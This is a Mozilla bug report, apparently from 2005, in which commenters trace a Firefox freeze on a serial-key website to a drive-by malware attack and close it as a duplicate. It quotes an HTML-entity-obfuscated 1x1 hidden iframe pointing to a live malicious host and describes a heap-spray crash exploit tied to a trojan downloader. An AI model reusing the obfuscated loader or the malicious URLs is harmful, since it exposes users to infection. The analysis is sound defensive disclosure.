Closed Bug 320348 Opened 19 years ago Closed 19 years ago

browser freezes because of an illegal script

Categories

(Core :: Security, defect)

1.8 Branch
x86
Windows XP
defect
Not set
critical

Tracking

()

RESOLVED DUPLICATE of bug 317334

People

(Reporter: fignamoya, Assigned: dveditz)

References

()

Details

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5 Browser freezes due to an illegal script on a page. This, in turn causes all firefox windows to close. Reproducible: Always Steps to Reproduce: 1. go to http://www.serials.ws/all/?l=v&pn=3 2. ctrl+f and search 1301 on the page (javascript link to visual assist x... 1301) 3. click on the link and observe how the browser runs cpu usage to 100%
Version: unspecified → 1.5 Branch
Component: General → Layout
Product: Firefox → Core
QA Contact: general → layout
Version: 1.5 Branch → 1.8 Branch
Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9a1) Gecko/20051215 Firefox/1.6a1 ID:2005121500 I see this too.
in addition this appears to disable block popups option in the browser
Component: Layout → JavaScript Engine
view-source:http://www.serials.ws/all/?l=v&pn=3 <a href=javascript:d(170307)>Visual Assist X 10.1.1301</a> :: 2005-04-30 http://www.serials.ws/serws.js function d(id){ window.open('/d.php?n='+id,'Operate','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,width=650,height=550'); } view-source:http://www.serials.ws/d.php?170307 this page contains an iframe: <iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#116;&#111;&#111;&#108;&#98;&#97;&#114;&#117;&#114;&#108;&#46;&#98;&#105;&#122;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#54;&#54;&#49;&#46;&#112;&#104;&#112;" width=1 height=1></iframe> the iframe loads: view-source:http://toolbarurl.biz/dl/adv661.php this in turn loads 8 iframes: view-source:http://toolbarurl.biz/dl/fillmemadv661.htm and 1 iframe: view-source:http://toolbarurl.biz/dl/bag.htm
seen with the view-source: prefixed, the URLs in comment 3 are harmless. view-source:http://toolbarurl.biz/dl/fillmemadv661.htm fills the memory with with 100000 times an returnadress, and then a short piece of code, 586 words. memory is filled by 8 iframes of this type, and the bag.html seems to be used to produce a crash, hopefully landing in one of those long regions leading to the exploit code. google search for ADV661 shows it is a trojan: http://sandbox.norman.no/live_2.html?logfile=437547 http://www.sophos.com/virusinfo/analyses/trojdownldrdl.html If you've been on the site, read the reports to check if you are infected. I don't want to try going to this site with js enabled. I'm setting component to Security, so dveditz@cruzio.com can look if we are in danger, or if it's just a hang.
Assignee: nobody → dveditz
Status: UNCONFIRMED → NEW
Component: JavaScript Engine → Security
Ever confirmed: true
QA Contact: layout → toolkit
Similar scripts used in Bug 320760 Browser hangs at 100% CPU following document.write by malicious javascript Bug 317334 hang when long wrappable string is passed to prompt() [e.g. as used in the exploit for IE's <body onload=window()> bug] *** This bug has been marked as a duplicate of 317334 ***
Status: NEW → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.